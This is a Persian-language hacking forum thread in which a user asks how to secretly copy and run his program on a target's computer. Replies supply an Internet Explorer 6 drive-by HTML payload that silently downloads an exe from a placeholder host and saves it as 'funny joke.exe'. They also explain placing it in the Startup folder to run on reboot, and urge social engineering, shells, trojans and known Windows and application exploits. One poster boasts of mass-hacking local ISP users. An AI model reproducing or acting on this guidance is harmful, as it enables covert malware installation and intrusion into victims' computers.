سلام خدمت دوستان عزيز
من يه برنامه دارم كه مي خوام اون رو در سيستم هدف كپي و اجرا كنم!!
برايه اينكار از طريق فلش مموري عمل كردم!! يعني رويه فلش تعدادي عكس به مراه برنامه مورد نظر قرار دادم طوريكه طرف اگر فلش رو به سيستم وصل كند كه عكس ها رو ببينه برنامه من رويه سيستم كپي شده و اجرا مي شود!!
اما مي خوام كه دوستان روشي رو معرفي كنند يا راهنمايي كنند تا بدون ارتباط مستقيم به سيستم هدف بتوان اين كار رو انجام داد!!
چه روشهاي نفوذي برايه اين كار وجود دارد!!؟
ممنون ميشم اگه دوستان بنده رو راهنمايي كنند!
اگه ie6 داره میتونی از روش activex عمل کنی ادرس سایت الوده رو بدی بهش وقتی بره توش همه چی حله
دوست عزيز ممنون از توجهتون
ولي ميشه راجع به اين روش يكم بيشتر توضيح بديد كه من بايد چكار كنم!! تويه سايت بايد چي بزارم و رويه سايت چكار كنم تا وقتي كه رفت تويه سايت همه چي حل بشه!!!؟
خوب این کار فقط در صورتی امکان پزیره که طرف شما از Internet Explorer 6 استفاده کنه.به این صورت که
<html>
<body>
<iframe src='http://your.domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascirpt:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>
یک وبلاگ درست کن برو و این کد رو بهش اضافه کن و بعد.فایل مورد نظرت رو رو یک هاست کپی کن مثل persiangig یا خیلی سایت های دیگه بعد ادرس رو بزار جای 'http://your.domain.com/v.exe که در بالا نوشتم و ادرس وبلاگ رو بده به طرف دیگه همه چی حله.
دوست عزيز ممنونم
ولي فكر مي كنم كه اين فقط رويه سيستم هدف ذخيره مي كنه!! حالا اگه بخواهيم كه بعد از ذخيره اجرا هم بكنه راهي وجود داره!!؟
ممنون ميشم اگه راهنمايي بفرماييد!
عنوان تاپیک میگه شما میخواید فایل رو اپلود کنید چیزی در باره اگرا نگفتی.در ضمن میتوانی مسیر ذخیره شد رو تغیر بدی و بریزی رو استارت اپ تا وقتی سیستم دوباره بالا امد اجرا بشه.همین.
ولی این روش مال Xp s2 IE6
هست و برای نسخه جدید کار نمیکنه.
خوب واقعا ممنون از دوستان و پاسخ هاشون تا حدود زيادي خوب بود!! يعني بهتر از روش فلش مموريه!!!
ولي همونطوي كه دوستمون گفتن اين فقط تويه IE6 كار ميكنه!! روش ديگري برايه اينكار هست!!؟ دوستان روش ديگري پيشنهاد نمي كنن!!؟
اگه بخوام از طريق ايميل اينكارو بكنم چطوري مي تونم انجامش بدم طوري كه يك ايميل به هدف بزنم و سپس به طريقيب برنامه رو سيستم هدف كپي بشه و بعد هم اجرا بشه!!؟ آيا امكان پذير هست!!؟
ممنون ميشم اگه بنده تازه وارد رو راهنمايي بفرماييد!!
هر راهی امکان پذیره و به خود شما بستگی داره که چطور اونو پیاده سازی کنین
ای بابا شما اصلا مهندسی اجتماعی بلدی ببین همه کار ها فقط از راه نفوز با یک ایمیل یا خیلی چیزای دیگه حل نمیشه شما اگر بلد باشی مخ بزنی به راحتی میتوانی فایل مورد نظر رو بدی به طرف بدون این که حتی متوجه بشه کاری رو که میخوای انجام بدی.نیاز به باگ و این چیزا نیست تازه اگر هم باشه شما ابتدا شل سیستم رو بگیر بعد خودت هرچی فایله بریز روی سیستم طرف.حتما میگی چطور شل بگیرم خوب چند راه داره1-دادن فایل مثلاwinshell یا JPS shell یا 2- EXPOLIT که 2 تا هستن 1- باگ های خود ویندوز مثل rpc یا ..... وباگ های نرم افزار های کاربردی مثل Winmap ,Winrar,IDM,IE8,FireFox,Opera,FTP,...... که انقدر تنوع دارن سر درد میگیری ولا من انقدر از این روش ها دیدم که اگر بخوام بنویسم یک کتاب 1000 صفحه ای میشه لطفا اگر اطلاعات شما در این زمینه کمه از پدر بزرگ Google بپرس تا یک سری مقاله برات بیاره بخون شاید توانستی مخ بزنی.
ممنون از پاسختون
فقط يه سوال ديگه!!
دوست عزيز با توجه به اينكه سيستم هدف يه سيستم معمولي هست كه از طريق يه ISP به اينترنت وصل ميشه بازم اين روش ها كاربرد داره!! چون تا اونجايي كه اطلاعات خيلي ناقص من قد ميده فكر مي كنم كه روش شل و اكسپلويت فقط زماني ميشه كه سيستم هدف تويه اينترنت به عنوان سرور يه سايت باشه يا اينكه بدونه واسطه يا IP valid تو اينترنت داشته باشه!!!
اگر درسته پس ميشه در اون حالت كه سيستم از ISP استفاده ميكنه چكار مي تونم بكنم!!!؟
خوب حالا شد یک چیزی ببین دوست من شما در هک سیستم اولین کاری که باید بکنید اینه یک سری اطلاعات از سیستم هدف بدست بیاری مثلا نوع سیستم عامل Xp Sp1 یا Xp Sp2 یا Sp3 یا Windows 2003 یا ...
خوب روش نفوز به هر کدوم فرق میکنه.حلا بحث سر اینه که شاید سیستم شما Ip Valid نباشه خوب سیستم های که Ip Valid ندارن معمولان زیر سیستم های یک سرور هستن که میشن Client خوب حالا شما برای نفوز به این جور سیستم ها دیگه باید یک جورای حرفه ای باشی به این سورت که از پورت بیندر استفاده کنی و سیستم های متصل به سرور رو با یک پور به هم متصل کنی که این خودش یک مبحث خیلی مشکله
و یک راه استفاده از تروجان که من اسمش یادم نیست که روی تمام سیستم های شبکه میریختی می شد ازش شل بگیری به این صورت که IP Server:70.xx.xx.x.x:IP Client:192.xx.xx.xx.x که اول ای پی سرور میدادی بعد : بعد هم ای پی سیستم هدف.خوب حالا شما اگر قصد هک یک سیستم که حالا من نمیدونم چیه رو هک کنید باید خودت دست به کار شی.و یک چیز رو بگم اگر سیستم متصل با Dial-up به شبکه وصله کار خواصی نمی تونی با شل و اینا انجام بدی چون ای پی تغیر میکنه ولی اگر فقط چیز خاصی برای یک بار نیاز داری میتونی بدست بیاری من خودم 70% سیستم های متصل به ISP شهر خودمون رو هک کردم
البته اون وقتا جوان بودم
در ضمن بگو ببینم کدوم بیچاره فلک زده ای رو می خوای هک کنی.بگو تا بهتر راهنمایت کنم.حتما کافینت یا شرکتی چیزیه.:))